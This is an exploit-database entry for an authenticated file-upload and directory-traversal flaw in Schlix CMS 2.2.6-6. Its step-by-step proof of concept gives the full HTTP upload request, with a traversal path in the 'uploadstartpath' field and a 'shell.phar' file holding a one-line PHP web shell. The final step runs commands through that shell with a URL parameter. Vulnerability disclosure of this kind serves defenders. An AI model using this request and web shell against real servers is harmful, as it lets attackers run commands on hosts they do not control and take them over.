Share
## https://sploitus.com/exploit?id=PACKETSTORM:162751
# Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)  
# Date: 21.05.2021  
# Exploit Author: Emir Polat  
# Vendor Homepage: https://www.schlix.com/  
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html  
# Version: 2.2.6-6  
# Tested On: Ubuntu 20.04 (Firefox)  
  
############################################################################################################  
  
Summary: An authorized user can upload a file with a .phar extension  
to a path of his choice and control the content as he wishes. This causes RCE vulnerability.  
  
For full technical details and source code analysis:  
https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e.  
  
############################################################################################################  
  
PoC:  
  
1-) Login to admin panel with true credentials and go to "Tools ->  
Mediamanager" menu from left side.  
  
2-) Click the "Upload File" and upload a file and catch the request with Burp.  
  
3-) Change the "uploadstartpath", "filename" and file content as follows.  
  
# Request  
  
POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1  
Host: vulnerable-server  
Content-Length: 846  
X-Schlix-Ajax: 1  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundarybllOFLruz1WAs7K2  
Accept: */*  
Origin: http:// <http://10.211.55.4/>vulnerable-server  
Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager  
<http://10.211.55.4/schlix/admin/app/core.mediamanager>  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf;  
schlix-your-cookie;__atuvc=5%7C20;  
schlix_frontendedit_control_showblock=-2;  
schlix_frontendedit_control_showhide=-2;  
schlix_frontendedit_control_showdoc=-2  
Connection: close  
  
------WebKitFormBoundarybllOFLruz1WAs7K2  
Content-Disposition: form-data; name="_csrftoken"  
  
{your_csrf_token}  
------WebKitFormBoundarybllOFLruz1WAs7K2  
Content-Disposition: form-data; name="uploadstartpath"  
  
/media/docs/....//....//....//....//system/images/avatars/large/  
------WebKitFormBoundarybllOFLruz1WAs7K2  
Content-Disposition: form-data; name="filedata[]"; filename="shell.phar"  
  
<?PHP system($_GET['rce']);?>  
  
------WebKitFormBoundarybllOFLruz1WAs7K2  
Content-Disposition: form-data; name="MAX_FILE_SIZE"  
  
2097152  
------WebKitFormBoundarybllOFLruz1WAs7K2  
Content-Disposition: form-data; name="filedata__total_file_size"  
  
0  
------WebKitFormBoundarybllOFLruz1WAs7K2  
Content-Disposition: form-data; name="filedata__max_file_count"  
  
20  
------WebKitFormBoundarybllOFLruz1WAs7K2--  
  
  
4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls".